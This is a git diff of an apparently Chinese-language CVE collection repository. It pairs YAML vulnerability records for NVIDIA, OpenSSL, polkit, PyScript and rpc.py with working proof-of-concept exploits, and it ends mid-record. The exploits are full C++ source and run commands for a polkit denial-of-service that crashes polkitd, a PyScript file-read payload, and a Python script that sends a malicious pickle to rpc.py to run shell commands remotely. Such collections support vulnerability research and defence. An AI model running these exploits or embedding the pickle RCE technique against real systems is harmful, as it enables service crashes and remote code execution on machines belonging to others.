NVIDIA提供了针对Linux系统的官方显卡驱动程序,这些驱动程序包括内核模块、用户空间库和命令行工具,可以与Linux操作系统集成,提供高性能的图形加速和计算能力。 + severity: High + description: | + 漏洞CVE-2021-1056是NVIDIA GPU驱动程序与设备隔离相关的安全漏洞。当容器以非特权模式启动,攻击者利用这个漏洞,在容器中创建特殊的字符设备文件后,能够获取宿主机上所有GPU设备的访问权限。 + 适用于Linux的 NVIDIA GPU显示驱动程序,所有版本,都包含内核模式层 (nvidia.ko) 中的一个漏洞,在该漏洞中它不完全遵守操作系统文件系统权限以提供 GPU 设备级隔离,这可能会导致拒绝服务 或信息披露。 + scope-of-influence: + nvidia:gpu_driver:390≤390.141, nvidia:gpu_driver:450≤450.102.04, nvidia:gpu_driver:460≤460.32.03. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056 + - https://nvidia.custhelp.com/app/answers/detail/a_id/5142 + - https://ubuntu.com/security/notices/USN-4689-1 + - https://ubuntu.com/security/notices/USN-4689-2 + - https://ubuntu.com/security/CVE-2021-1056 + - https://www.cvedetails.com/cve/CVE-2021-1056/?q=CVE-2021-1056 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H + cvss-score: 7.1 + cve-id: CVE-2021-1056 + cwe-id: CWE-276 tags: 权限提升, 拒绝服务, 信息泄漏, cve2021 \ No newline at end of file diff --git a/cve/openssl/2022/CVE-2022-0778/bad_BN.c b/cve/openssl/2022/CVE-2022-0778/bad_BN.c index 34247ac8cd5324e2a1c58716edef597ea22d521e..6fbf819b3429b2681b3cd4e0cec5a645c0742d14 100644 --- a/cve/openssl/2022/CVE-2022-0778/bad_BN.c +++ b/cve/openssl/2022/CVE-2022-0778/bad_BN.c @@ -1,22 +1,22 @@ -#include - - -int main() { - BN_CTX *ctx; - ctx = BN_CTX_new(); - BIGNUM *res, *a, *p; - res = BN_CTX_get(ctx); - a = BN_CTX_get(ctx); - p = BN_CTX_get(ctx); - - BN_dec2bn(&p, "697"); - BN_dec2bn(&a, "696"); - - printf("p = %s\n", BN_bn2dec(p)); - printf("a = %s\n", BN_bn2dec(a)); - - BIGNUM* check = BN_mod_sqrt(res, a, p, ctx); - printf("%s\n", BN_bn2dec(res)); - - return 0; +#include + + +int main() { + BN_CTX *ctx; + ctx = BN_CTX_new(); + BIGNUM *res, *a, *p; + res = BN_CTX_get(ctx); + a = BN_CTX_get(ctx); + p = BN_CTX_get(ctx); + + BN_dec2bn(&p, "697"); + BN_dec2bn(&a, "696"); + + printf("p = %s\n", BN_bn2dec(p)); + printf("a = %s\n", BN_bn2dec(a)); + + BIGNUM* check = BN_mod_sqrt(res, a, p, ctx); + printf("%s\n", BN_bn2dec(res)); + + return 0; } \ No newline at end of file diff --git a/cve/openssl/2022/yaml/CVE-2022-3786.yaml b/cve/openssl/2022/yaml/CVE-2022-3786.yaml index c532b8a2628b67b938cc5453165e60bb4e5ca9ef..f34c7ba9bb24a6596920be35acb0a07b19dc541b 100644 --- a/cve/openssl/2022/yaml/CVE-2022-3786.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-3786.yaml @@ -1,19 +1,19 @@ -id: CVE-2022-3786 -source: https://github.com/WhatTheFuzz/openssl-fuzz -info: - name: 在TLS客户端中,通过连接到恶意服务器来触发漏洞。如果服务器请求客户端身份验证而恶意客户端连接,触发OpenSSL缓冲区溢出漏洞。 - severity: High - description: | - 在X.509证书验证中,特别是在名称约束检查中,可能会触发缓冲区溢出。这种情况发生在证书链签名验证之后,并且要求CA已经签署了恶意证书,或者要求应用程序在无法构造到受信任的颁发者的路径的情况下继续进行证书验证。攻击者可以在证书中伪造一个恶意的电子邮件地址来溢出任意数量的字节,其中包含'。'字符(十进制46)。缓冲区溢出可能导致崩溃(导致拒绝服务)。 - scope-of-influence: - 3.0.0 <= OpenSSL <= 3.0.6 - reference: - https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c42165b5706e42f67ef8ef4c351a9a4c5d21639a - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2022-3786 - cwe-id: CWE-120 - cnvd-id: None - kve-id: None +id: CVE-2022-3786 +source: https://github.com/WhatTheFuzz/openssl-fuzz +info: + name: 在TLS客户端中,通过连接到恶意服务器来触发漏洞。如果服务器请求客户端身份验证而恶意客户端连接,触发OpenSSL缓冲区溢出漏洞。 + severity: High + description: | + 在X.509证书验证中,特别是在名称约束检查中,可能会触发缓冲区溢出。这种情况发生在证书链签名验证之后,并且要求CA已经签署了恶意证书,或者要求应用程序在无法构造到受信任的颁发者的路径的情况下继续进行证书验证。攻击者可以在证书中伪造一个恶意的电子邮件地址来溢出任意数量的字节,其中包含'。'字符(十进制46)。缓冲区溢出可能导致崩溃(导致拒绝服务)。 + scope-of-influence: + 3.0.0 <= OpenSSL <= 3.0.6 + reference: + https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c42165b5706e42f67ef8ef4c351a9a4c5d21639a + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2022-3786 + cwe-id: CWE-120 + cnvd-id: None + kve-id: None tags: 缓冲区溢出, CVE-2022 \ No newline at end of file diff --git a/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt b/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt index c76a99b7612797f58c8a3aec3d6a830a724679e8..5ecd18e997575271a54e0c30742cb183c2dd8960 100644 --- a/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt +++ b/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt @@ -1,30 +1,30 @@ -cmake_minimum_required(VERSION 3.10) - -enable_testing() - -# set the project name -project(GHSL-2021-077-polkit VERSION 1.0.0 DESCRIPTION "Proof of concept exploit for GHSL-2021-077: file descriptor exhaustion in polkit") - -# specify the C++ standard -set(CMAKE_CXX_STANDARD 17) -set(CMAKE_CXX_STANDARD_REQUIRED True) - -option(USE_SANITIZERS "Enable ASAN and UBSAN" OFF) - -add_compile_options(-Wall -Wextra -pedantic -Werror) - -if (USE_SANITIZERS) - set(SANITIZER_FLAGS "-fsanitize=address,undefined") - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${SANITIZER_FLAGS}") - set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${SANITIZER_FLAGS}") - set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${SANITIZER_FLAGS}") - set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} ${SANITIZER_FLAGS}") -endif() - -add_subdirectory(DBusParse) - -add_executable(locksessions locksessions.cpp) -target_link_libraries(locksessions PUBLIC DBusParse DBusParseUtils crypt) -target_include_directories( - locksessions PRIVATE - $) +cmake_minimum_required(VERSION 3.10) + +enable_testing() + +# set the project name +project(GHSL-2021-077-polkit VERSION 1.0.0 DESCRIPTION "Proof of concept exploit for GHSL-2021-077: file descriptor exhaustion in polkit") + +# specify the C++ standard +set(CMAKE_CXX_STANDARD 17) +set(CMAKE_CXX_STANDARD_REQUIRED True) + +option(USE_SANITIZERS "Enable ASAN and UBSAN" OFF) + +add_compile_options(-Wall -Wextra -pedantic -Werror) + +if (USE_SANITIZERS) + set(SANITIZER_FLAGS "-fsanitize=address,undefined") + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${SANITIZER_FLAGS}") + set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${SANITIZER_FLAGS}") + set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${SANITIZER_FLAGS}") + set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} ${SANITIZER_FLAGS}") +endif() + +add_subdirectory(DBusParse) + +add_executable(locksessions locksessions.cpp) +target_link_libraries(locksessions PUBLIC DBusParse DBusParseUtils crypt) +target_include_directories( + locksessions PRIVATE + $) diff --git a/cve/polkit/2021/CVE-2021-4115/README.md b/cve/polkit/2021/CVE-2021-4115/README.md index 5f7d84a9cbdda7b93e72f851549fd6d47980b55d..f8168c4105474da3815b8baa692476a53121d25e 100644 --- a/cve/polkit/2021/CVE-2021-4115/README.md +++ b/cve/polkit/2021/CVE-2021-4115/README.md @@ -1,52 +1,52 @@ -Copyright 2021 Kevin Backhouse. - -# GHSL-2021-077 - -This repository contains a proof of concept exploit for GHSL-2021-077: -file descriptor exhaustion in -[polkit](https://gitlab.freedesktop.org/polkit/polkit). - -# Build - -Instructions for building the PoC: - -```bash -git submodule update --init # Download https://github.com/kevinbackhouse/DBusParse -mkdir build -cd build -cmake .. -make -``` - -# Running - -The PoC causes polkit to leak eventfd file descriptors. After several runs -of the PoC, polkit will leak so many file descriptors that it will crash -due to exceeding its quota of file descriptors. - -First, check how many file descriptors polkit has open: - -```bash -$ sudo ls -l /proc/`pidof polkitd`/fd | wc - 12 123 680 -``` - -Now run the PoC: - -```bash -./locksessions /var/run/dbus/system_bus_socket 0x4000 -``` - -(The PoC is named locksessions because it calls the -org.freedesktop.login1.Manager.LockSessions D-Bus method.) - -Now check again how many file descriptors polkit has open: - -``` -$ sudo ls -l /proc/`pidof polkitd`/fd | wc - 255 2796 16872 -``` - -Notice that a large number of eventfd file descriptors have been -leaked. After few more runs of the PoC, polkit will most likely -crash. +Copyright 2021 Kevin Backhouse. + +# GHSL-2021-077 + +This repository contains a proof of concept exploit for GHSL-2021-077: +file descriptor exhaustion in +[polkit](https://gitlab.freedesktop.org/polkit/polkit). + +# Build + +Instructions for building the PoC: + +```bash +git submodule update --init # Download https://github.com/kevinbackhouse/DBusParse +mkdir build +cd build +cmake .. +make +``` + +# Running + +The PoC causes polkit to leak eventfd file descriptors. After several runs +of the PoC, polkit will leak so many file descriptors that it will crash +due to exceeding its quota of file descriptors. + +First, check how many file descriptors polkit has open: + +```bash +$ sudo ls -l /proc/`pidof polkitd`/fd | wc + 12 123 680 +``` + +Now run the PoC: + +```bash +./locksessions /var/run/dbus/system_bus_socket 0x4000 +``` + +(The PoC is named locksessions because it calls the +org.freedesktop.login1.Manager.LockSessions D-Bus method.) + +Now check again how many file descriptors polkit has open: + +``` +$ sudo ls -l /proc/`pidof polkitd`/fd | wc + 255 2796 16872 +``` + +Notice that a large number of eventfd file descriptors have been +leaked. After few more runs of the PoC, polkit will most likely +crash. diff --git a/cve/polkit/2021/CVE-2021-4115/locksessions.cpp b/cve/polkit/2021/CVE-2021-4115/locksessions.cpp index 2046cc8a087189039d2c676e93b494410b7a0e78..5c036a263085aefbc06d39acc17b8b4ad1bddffc 100644 --- a/cve/polkit/2021/CVE-2021-4115/locksessions.cpp +++ b/cve/polkit/2021/CVE-2021-4115/locksessions.cpp @@ -1,111 +1,111 @@ -// Copyright 2021 Kevin Backhouse. -// -// This file is part of GHSL-2021-077-polkit. -// -// GHSL-2021-077-polkit is free software: you can redistribute it and/or modify -// it under the terms of the GNU General Public License as published by -// the Free Software Foundation, either version 3 of the License, or -// (at your option) any later version. -// -// GHSL-2021-077-polkit is distributed in the hope that it will be useful, -// but WITHOUT ANY WARRANTY; without even the implied warranty of -// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -// GNU General Public License for more details. -// -// You should have received a copy of the GNU General Public License -// along with GHSL-2021-077-polkit. If not, see . - - -#include "dbus_utils.hpp" -#include "dbus_auth.hpp" -#include "utils.hpp" -#include -#include -#include - -class DBusSocket : public AutoCloseFD { -public: - DBusSocket(const uid_t uid, const char* filename) : - AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0)) - { - if (get() < 0) { - throw ErrorWithErrno("Could not create socket"); - } - - sockaddr_un address; - memset(&address, 0, sizeof(address)); - address.sun_family = AF_UNIX; - strcpy(address.sun_path, filename); - - if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) { - throw ErrorWithErrno("Could not connect socket"); - } - - dbus_sendauth(uid, get()); - - dbus_send_hello(get()); - std::unique_ptr hello_reply1 = receive_dbus_message(get()); - std::string name = hello_reply1->getBody().getElement(0)->toString().getValue(); - std::unique_ptr hello_reply2 = receive_dbus_message(get()); - } -}; - -static void send_logind_LockSessions(const int fd, const uint32_t serialNumber) { - dbus_method_call( - fd, - serialNumber, - DBusMessageBody::mk0(), - _s("/org/freedesktop/login1"), - _s("org.freedesktop.login1.Manager"), - _s("org.freedesktop.login1"), - _s("LockSessions") - ); -} - -// Keep trying `attempt_LockSessions_with_disconnect` with different -// delay values until the exploit succeeds (or we decide to give up). -static void exploit_LockSessions( - const uid_t uid, - const char* filename, - const long n -) { - DBusSocket fd(uid, filename); - - for (long i = 0; i < n; i++) { - send_logind_LockSessions(fd.get(), i+1); - } -} - -static void usage(const char* progname) { - fprintf( - stderr, - "usage: %s \n" - "example: %s /var/run/dbus/system_bus_socket 4096\n", - progname, - progname - ); -} - -int main(int argc, char* argv[]) { - const char* progname = argc > 0 ? argv[0] : "a.out"; - if (argc != 3) { - usage(progname); - return EXIT_FAILURE; - } - - char* endptr = 0; - const long n = strtol(argv[2], &endptr, 0); - if (endptr == argv[2] || *endptr != '\0') { - usage(progname); - return EXIT_FAILURE; - } - - const uid_t uid = getuid(); - const char* filename = argv[1]; - - for (size_t i = 0; i < 1; i++) { - exploit_LockSessions(uid, filename, n); - } - - return EXIT_SUCCESS; -} +// Copyright 2021 Kevin Backhouse. +// +// This file is part of GHSL-2021-077-polkit. +// +// GHSL-2021-077-polkit is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// GHSL-2021-077-polkit is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with GHSL-2021-077-polkit. If not, see . + + +#include "dbus_utils.hpp" +#include "dbus_auth.hpp" +#include "utils.hpp" +#include +#include +#include + +class DBusSocket : public AutoCloseFD { +public: + DBusSocket(const uid_t uid, const char* filename) : + AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0)) + { + if (get() < 0) { + throw ErrorWithErrno("Could not create socket"); + } + + sockaddr_un address; + memset(&address, 0, sizeof(address)); + address.sun_family = AF_UNIX; + strcpy(address.sun_path, filename); + + if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) { + throw ErrorWithErrno("Could not connect socket"); + } + + dbus_sendauth(uid, get()); + + dbus_send_hello(get()); + std::unique_ptr hello_reply1 = receive_dbus_message(get()); + std::string name = hello_reply1->getBody().getElement(0)->toString().getValue(); + std::unique_ptr hello_reply2 = receive_dbus_message(get()); + } +}; + +static void send_logind_LockSessions(const int fd, const uint32_t serialNumber) { + dbus_method_call( + fd, + serialNumber, + DBusMessageBody::mk0(), + _s("/org/freedesktop/login1"), + _s("org.freedesktop.login1.Manager"), + _s("org.freedesktop.login1"), + _s("LockSessions") + ); +} + +// Keep trying `attempt_LockSessions_with_disconnect` with different +// delay values until the exploit succeeds (or we decide to give up). +static void exploit_LockSessions( + const uid_t uid, + const char* filename, + const long n +) { + DBusSocket fd(uid, filename); + + for (long i = 0; i < n; i++) { + send_logind_LockSessions(fd.get(), i+1); + } +} + +static void usage(const char* progname) { + fprintf( + stderr, + "usage: %s \n" + "example: %s /var/run/dbus/system_bus_socket 4096\n", + progname, + progname + ); +} + +int main(int argc, char* argv[]) { + const char* progname = argc > 0 ? argv[0] : "a.out"; + if (argc != 3) { + usage(progname); + return EXIT_FAILURE; + } + + char* endptr = 0; + const long n = strtol(argv[2], &endptr, 0); + if (endptr == argv[2] || *endptr != '\0') { + usage(progname); + return EXIT_FAILURE; + } + + const uid_t uid = getuid(); + const char* filename = argv[1]; + + for (size_t i = 0; i < 1; i++) { + exploit_LockSessions(uid, filename, n); + } + + return EXIT_SUCCESS; +} diff --git a/cve/polkit/2021/yaml/CVE-2021-4115.yaml b/cve/polkit/2021/yaml/CVE-2021-4115.yaml index 6b342c5462f38db15690c4d26260abc78770d2d9..335c9413171e3b4d7ad8d705561a7822036e0dd0 100644 --- a/cve/polkit/2021/yaml/CVE-2021-4115.yaml +++ b/cve/polkit/2021/yaml/CVE-2021-4115.yaml @@ -1,23 +1,23 @@ -id: CVE-2021-4115 -source: https://github.com/github/securitylab/tree/main/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115 -info: - name: Polkit(PolicyKit)是类Unix系统中一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分,可以使授权非特权用户根据定义的策略以特权用户的身份执行命令。 - severity: Medium - description: | - Polkit 存在资源管理错误漏洞,该漏洞源于进程文件描述符耗尽,攻击者利用该漏洞允许非特权用户导致polkit崩溃。 - scope-of-influence: - polkit = 0.117 - reference: - - https://access.redhat.com/security/cve/cve-2021-4115 - - https://gitlab.com/redhat/centos-stream/rpms/polkit/-/merge_requests/6/diffs?commit_id=bf900df04dc390d389e59aa10942b0f2b15c531e - - https://gitlab.freedesktop.org/polkit/polkit/-/issues/141 - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VGKWCBS6IDZYYDYM2WIWJM5BL7QQTWPF/ - - https://www.oracle.com/security-alerts/cpujul2022.html - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H - cvss-score: 5.5 - cve-id: CVE-2021-4115 - cwe-id: CWE-400 - cnvd-id: None - kve-id: None +id: CVE-2021-4115 +source: https://github.com/github/securitylab/tree/main/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115 +info: + name: Polkit(PolicyKit)是类Unix系统中一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分,可以使授权非特权用户根据定义的策略以特权用户的身份执行命令。 + severity: Medium + description: | + Polkit 存在资源管理错误漏洞,该漏洞源于进程文件描述符耗尽,攻击者利用该漏洞允许非特权用户导致polkit崩溃。 + scope-of-influence: + polkit = 0.117 + reference: + - https://access.redhat.com/security/cve/cve-2021-4115 + - https://gitlab.com/redhat/centos-stream/rpms/polkit/-/merge_requests/6/diffs?commit_id=bf900df04dc390d389e59aa10942b0f2b15c531e + - https://gitlab.freedesktop.org/polkit/polkit/-/issues/141 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VGKWCBS6IDZYYDYM2WIWJM5BL7QQTWPF/ + - https://www.oracle.com/security-alerts/cpujul2022.html + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H + cvss-score: 5.5 + cve-id: CVE-2021-4115 + cwe-id: CWE-400 + cnvd-id: None + kve-id: None tags: cve2021, 未加控制的资源消耗(资源穷尽) \ No newline at end of file diff --git a/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt b/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt index c9a9c288b0574944ff46834082e08b7beaf9ebc2..5df5b8b9b8d0928a30c649822cc1865e01bc8c0d 100644 --- a/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt +++ b/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt @@ -1,18 +1,18 @@ -# Exploit Title: PyScript Remote Emscripten VMemory Python libraries -Source Codes Read -# Date: 5-9-2022 -# Exploit Author: Momen Eldawakhly (Cyber Guy) -# Vendor Homepage: https://pyscript.net/ -# Software Link: https://github.com/pyscript/pyscript -# Version: 2022-05-04-Alpha -# Tested on: Ubuntu Apache Server -# CVE : CVE-2022-30286 - - -x = "CyberGuy" -if x == "CyberGuy": - with open('/lib/python3.10/asyncio/tasks.py') as output: - contents = output.read() - print(contents) -print('') +# Exploit Title: PyScript Remote Emscripten VMemory Python libraries +Source Codes Read +# Date: 5-9-2022 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: https://pyscript.net/ +# Software Link: https://github.com/pyscript/pyscript +# Version: 2022-05-04-Alpha +# Tested on: Ubuntu Apache Server +# CVE : CVE-2022-30286 + + +x = "CyberGuy" +if x == "CyberGuy": + with open('/lib/python3.10/asyncio/tasks.py') as output: + contents = output.read() + print(contents) +print('') \ No newline at end of file diff --git a/cve/python/2022/CVE-2022-30286/README.md b/cve/python/2022/CVE-2022-30286/README.md index 68e763a90dd3b0569329ac582ca3869118471939..bae1fb18cb20dcd18a1d7380a40e2e560463b69b 100644 --- a/cve/python/2022/CVE-2022-30286/README.md +++ b/cve/python/2022/CVE-2022-30286/README.md @@ -1,25 +1,25 @@ -# PyScript Remote Emscripten VMemory Python libraries -Date: 5-9-2022 -Exploit Author: Momen Eldawakhly (Cyber Guy) -Vendor Homepage: https://pyscript.net/ -Software Link: https://github.com/pyscript/pyscript -Version: 2022-05-04-Alpha -Tested on: Ubuntu Apache Server -CVE : CVE-2022-30286 -# Poc -``` - -x = "CyberGuy" -if x == "CyberGuy": - with open('/lib/python3.10/asyncio/tasks.py') as output: - contents = output.read() - print(contents) -print('') - -``` -# reference -http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html -https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript -https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read -https://github.com/pyscript/pyscript/commits/main +# PyScript Remote Emscripten VMemory Python libraries +Date: 5-9-2022 +Exploit Author: Momen Eldawakhly (Cyber Guy) +Vendor Homepage: https://pyscript.net/ +Software Link: https://github.com/pyscript/pyscript +Version: 2022-05-04-Alpha +Tested on: Ubuntu Apache Server +CVE : CVE-2022-30286 +# Poc +``` + +x = "CyberGuy" +if x == "CyberGuy": + with open('/lib/python3.10/asyncio/tasks.py') as output: + contents = output.read() + print(contents) +print('') + +``` +# reference +http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html +https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript +https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read +https://github.com/pyscript/pyscript/commits/main https://www.exploit-db.com/exploits/50918 \ No newline at end of file diff --git a/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py index 467cc1752e766874ca03b9077a2d49e546351da5..1ea07853d0c99456b4913c35dfedad091488135a 100644 --- a/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py +++ b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py @@ -1,52 +1,52 @@ -# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE) -# Google Dork: N/A -# Date: 2022-07-12 -# Exploit Author: Elias Hohl -# Vendor Homepage: https://github.com/abersheeran -# Software Link: https://github.com/abersheeran/rpc.py -# Version: v0.4.2 - v0.6.0 -# Tested on: Debian 11, Ubuntu 20.04 -# CVE : CVE-2022-35411 - -import requests -import pickle - -# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py - -HOST =3D "127.0.0.1:65432" - -URL =3D f"http://{HOST}/sayhi" - -HEADERS =3D { - "serializer": "pickle" -} - - -def generate_payload(cmd): - - class PickleRce(object): - def __reduce__(self): - import os - return os.system, (cmd,) - - payload =3D pickle.dumps(PickleRce()) - - print(payload) - - return payload - - -def exec_command(cmd): - - payload =3D generate_payload(cmd) - - requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS) - - -def main(): - exec_command('curl http://127.0.0.1:4321') - # exec_command('uname -a') - - -if __name__ =3D=3D "__main__": +# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE) +# Google Dork: N/A +# Date: 2022-07-12 +# Exploit Author: Elias Hohl +# Vendor Homepage: https://github.com/abersheeran +# Software Link: https://github.com/abersheeran/rpc.py +# Version: v0.4.2 - v0.6.0 +# Tested on: Debian 11, Ubuntu 20.04 +# CVE : CVE-2022-35411 + +import requests +import pickle + +# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py + +HOST =3D "127.0.0.1:65432" + +URL =3D f"http://{HOST}/sayhi" + +HEADERS =3D { + "serializer": "pickle" +} + + +def generate_payload(cmd): + + class PickleRce(object): + def __reduce__(self): + import os + return os.system, (cmd,) + + payload =3D pickle.dumps(PickleRce()) + + print(payload) + + return payload + + +def exec_command(cmd): + + payload =3D generate_payload(cmd) + + requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS) + + +def main(): + exec_command('curl http://127.0.0.1:4321') + # exec_command('uname -a') + + +if __name__ =3D=3D "__main__": main() \ No newline at end of file diff --git a/cve/python/2022/CVE-2022-35411/README.md b/cve/python/2022/CVE-2022-35411/README.md index fbc233473da7637ea1751976cf17faa48faeadbb..25db92b43000b1aa91f3ac966c1a189c88ae4df1 100644 --- a/cve/python/2022/CVE-2022-35411/README.md +++ b/cve/python/2022/CVE-2022-35411/README.md @@ -1,18 +1,18 @@ -# rpc.py 0.6.0 - Remote Code Execution (RCE) -Google Dork: N/A -Date: 2022-07-12 -Exploit Author: Elias Hohl -Vendor Homepage: https://github.com/abersheeran -Software Link: https://github.com/abersheeran/rpc.py -Version: v0.4.2 - v0.6.0 -Tested on: Debian 11, Ubuntu 20.04 -CVE : CVE-2022-35411 -# Usage -``` -python CVE-2022-35411.py -``` -# reference -http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html -https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd Patch Third Party Advisory -https://github.com/ehtec/rpcpy-exploit Third Party Advisory +# rpc.py 0.6.0 - Remote Code Execution (RCE) +Google Dork: N/A +Date: 2022-07-12 +Exploit Author: Elias Hohl +Vendor Homepage: https://github.com/abersheeran +Software Link: https://github.com/abersheeran/rpc.py +Version: v0.4.2 - v0.6.0 +Tested on: Debian 11, Ubuntu 20.04 +CVE : CVE-2022-35411 +# Usage +``` +python CVE-2022-35411.py +``` +# reference +http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html +https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd Patch Third Party Advisory +https://github.com/ehtec/rpcpy-exploit Third Party Advisory https://medium.com/@elias.hohl/remote-code-execution-0-day-in-rpc-py-709c76690c30 \ No newline at end of file diff --git a/cve/python/2022/yaml/CVE-2022-30286.yaml b/cve/python/2022/yaml/CVE-2022-30286.yaml index 613b500754c4f138a4a7b16d780e36ff81d5d896..3d2d3f07b01d203dbafd2e8cab5faabcab12edc4 100644 --- a/cve/python/2022/yaml/CVE-2022-30286.yaml +++ b/cve/python/2022/yaml/CVE-2022-30286.yaml @@ -1,24 +1,24 @@ -id: CVE-2022-30286 -source: https://www.exploit-db.com/exploits/50918 -info: - name: PyScript Remote Emscripten VMemory Python libraries - severity: critical - description: - pyscriptjs (aka PyScript Demonstrator) in PyScript through 2022-05-04 allows a remote user to read Python source code. - scope-of-influence: - PyScript < v2.3 - reference: - - http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html - - https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript - - https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read - - https://github.com/pyscript/pyscript/commits/main - - https://www.exploit-db.com/exploits/50918 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-30286 - cwe-id: None - cnvd-id: None - kve-id: None - tags: +id: CVE-2022-30286 +source: https://www.exploit-db.com/exploits/50918 +info: + name: PyScript Remote Emscripten VMemory Python libraries + severity: critical + description: + pyscriptjs (aka PyScript Demonstrator) in PyScript through 2022-05-04 allows a remote user to read Python source code. + scope-of-influence: + PyScript < v2.3 + reference: + - http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html + - https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript + - https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read + - https://github.com/pyscript/pyscript/commits/main + - https://www.exploit-db.com/exploits/50918 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-30286 + cwe-id: None + cnvd-id: None + kve-id: None + tags: - Source Codes Read \ No newline at end of file diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml index 3e14c1845a5b10663053b181af3d4ab6fcab2b4e..c8e145a55e90910684d8f66f86a0e69886dffa47 100644 --- a/cve/python/2022/yaml/CVE-2022-35411.yaml +++ b/cve/python/2022/yaml/CVE-2022-35411.yaml @@ -1,22 +1,22 @@ -id: CVE-2022-35411 -source: https://www.exploit-db.com/exploits/50983 -info: - name: python中的rpc库,rpc是远程过程调用(Remote Procedure Call)的缩写形式。rpc采用客户机/服务器模式。请求程序就是一个客户机,而服务提供程序就是一个服务器。首先,调用进程发送一个有进程参数的调用信息到服务进程,然后等待应答信息。在服务器端,进程保持睡眠状态直到调用信息的到达为止。获得进程结果,然后调用执行继续进行。 - severity: critical - description: - rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. - 